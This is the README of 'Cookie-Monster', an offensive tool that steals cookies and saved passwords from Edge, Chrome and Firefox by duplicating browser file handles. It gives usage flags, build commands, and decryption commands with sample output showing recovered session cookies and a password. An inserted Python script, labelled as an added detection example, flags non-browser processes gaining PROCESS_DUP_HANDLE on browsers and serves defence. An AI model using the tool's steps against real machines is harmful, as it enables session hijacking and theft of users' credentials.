Steal browser cookies from Edge, Chrome and Firefox through a BOF or an exe! Cookie-Monster extracts the WebKit master key, locates a browser process that holds handles to the Cookies and Login Data files, duplicates those handles, and then downloads the target files filelessly. Once the Cookies/Login Data files have been downloaded, the Python decryption script can help extract the secrets they hold! The Firefox module parses profiles.ini, locates the logins.json and key4.db files and downloads them; a separate GitHub repo is referenced for their offline decryption.
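The handle-duplication step described above leaves telemetry a defender can key on: before a process can call DuplicateHandle() on a browser's open Cookies or Login Data file, it has to open the browser process with the PROCESS_DUP_HANDLE right, and Sysmon Event ID 10 (ProcessAccess) records that OpenProcess call together with SourceImage, TargetImage and GrantedAccess. The following Python script is an added detection example, not code from the Cookie-Monster project: it parses records of those three fields and flags any non-browser process that obtains PROCESS_DUP_HANDLE on chrome.exe, msedge.exe or firefox.exe. The pipe-separated record layout of SAMPLE_EVENTS is a constructed rendering of the Sysmon fields (real events are XML), the sample paths and process names are made up, and the access-right constants are the documented winnt.h values.

```python
"""Flag non-browser processes that obtain PROCESS_DUP_HANDLE on a browser.

Added detection example; not part of Cookie-Monster. The record format
parsed here is a constructed 'Key: Value|Key: Value' rendering of the
Sysmon Event ID 10 (ProcessAccess) fields SourceImage, TargetImage and
GrantedAccess.
"""
from dataclasses import dataclass

# Process access rights from winnt.h.
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Browsers whose Cookies / Login Data files the technique targets.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass(frozen=True)
class ProcessAccess:
    source_image: str
    target_image: str
    granted_access: int


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessAccess:
    """Parse one constructed 'Key: Value|Key: Value' record into a ProcessAccess."""
    fields = {}
    for part in line.split("|"):
        # partition on the first ':' so drive letters in the value survive
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    return ProcessAccess(
        source_image=fields["SourceImage"],
        target_image=fields["TargetImage"],
        granted_access=int(fields["GrantedAccess"], 16),
    )


def is_suspicious(ev: ProcessAccess) -> bool:
    """True when a non-browser process is granted PROCESS_DUP_HANDLE on a browser."""
    src, dst = basename(ev.source_image), basename(ev.target_image)
    if dst not in BROWSER_IMAGES:
        return False
    # Browsers open their own renderer/child processes with broad rights;
    # that is normal and would otherwise drown the signal.
    if src in BROWSER_IMAGES:
        return False
    return bool(ev.granted_access & PROCESS_DUP_HANDLE)


def find_suspicious(lines):
    """Return the parsed events from `lines` that match the rule."""
    return [ev for ev in map(parse_event, lines) if is_suspicious(ev)]


# Constructed sample records; not telemetry from any real host.
SAMPLE_EVENTS = [
    # chrome opening its own child: broad rights, but browser-to-browser.
    "SourceImage: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    "|TargetImage: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    "|GrantedAccess: 0x1FFFFF",
    # svchost asking for PROCESS_QUERY_LIMITED_INFORMATION only.
    "SourceImage: C:\\Windows\\System32\\svchost.exe"
    "|TargetImage: C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"
    "|GrantedAccess: 0x1000",
    # unknown binary opening Edge with a right set that includes 0x40.
    "SourceImage: C:\\Users\\Public\\update.exe"
    "|TargetImage: C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"
    "|GrantedAccess: 0x1440",
    # same right set, but the target is not a browser.
    "SourceImage: C:\\Users\\Public\\update.exe"
    "|TargetImage: C:\\Windows\\notepad.exe"
    "|GrantedAccess: 0x1440",
]

if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT {basename(ev.source_image)} -> {basename(ev.target_image)} "
              f"GrantedAccess=0x{ev.granted_access:X}")
```

Run against the samples, only the update.exe open of msedge.exe with 0x1440 (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE) is reported; Chrome's own child-process access and the query-only svchost.exe open are ignored. A production rule would read the fields from the Sysmon XML rather than this constructed layout, and the browser-to-browser exclusion should be tightened to the browser's real install path so that a renamed binary does not slip through it.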
BOF Usage

```
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <pid> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid> ]

cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-monster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444

cookie-monster Options:
    --chrome, looks at all running processes and their handles; if one matches chrome.exe it duplicates the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and their handles; if one matches msedge.exe it duplicates the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json files
    --chromeCookiePID, if the PID of a chrome process with a handle to Cookies is already known, specify it to duplicate that handle and copy the file
    --chromeLoginDataPID, if the PID of a chrome process with a handle to Login Data is already known, specify it to duplicate that handle and copy the file
    --edgeCookiePID, if the PID of an edge process with a handle to Cookies is already known, specify it to duplicate that handle and copy the file
    --edgeLoginDataPID, if the PID of an edge process with a handle to Login Data is already known, specify it to duplicate that handle and copy the file
```

EXE Usage

```
Cookie Monster Example:
    cookie-monster.exe --all

Cookie Monster Options:
    -h, --help   Show this help message and exit
    --all        Run the chrome, edge, and firefox methods
    --edge       Extract edge keys and download the Cookies/Login Data files to the PWD
    --chrome     Extract chrome keys and download the Cookies/Login Data files to the PWD
    --firefox    Locate the firefox key and Cookies; does not make a copy of either file
```

Decryption Steps
Install the requirements:

```
pip3 install -r requirements.txt
```

Base64-encode the WebKit master key:

```
python3 base64-encode.py "\xec\xfc...."
```

Decrypt the Chrome/Edge Cookies file:

```
python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
```

Decrypt the Chrome/Edge passwords file:

```
python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
```

Decrypt Firefox Cookies and stored credentials:

https://github.com/lclevy/firepwd
Installation

Make sure Mingw-w64 and make are installed on Linux before compiling:

```
make
```

Compile the exe on Windows:

```
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
```

TODO

- Update decrypt.py to support Firefox based on firepwd, and add a bruteforce module based on DonPAPI
References

This project could not have been completed without the help of Mr-Un1k0d3r and his wonderful seasonal videos! Highly recommend checking out his course!!!

Cookie WebKit master key extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypting Cookies and Login Data: https://github.com/login-securite/DonPAPI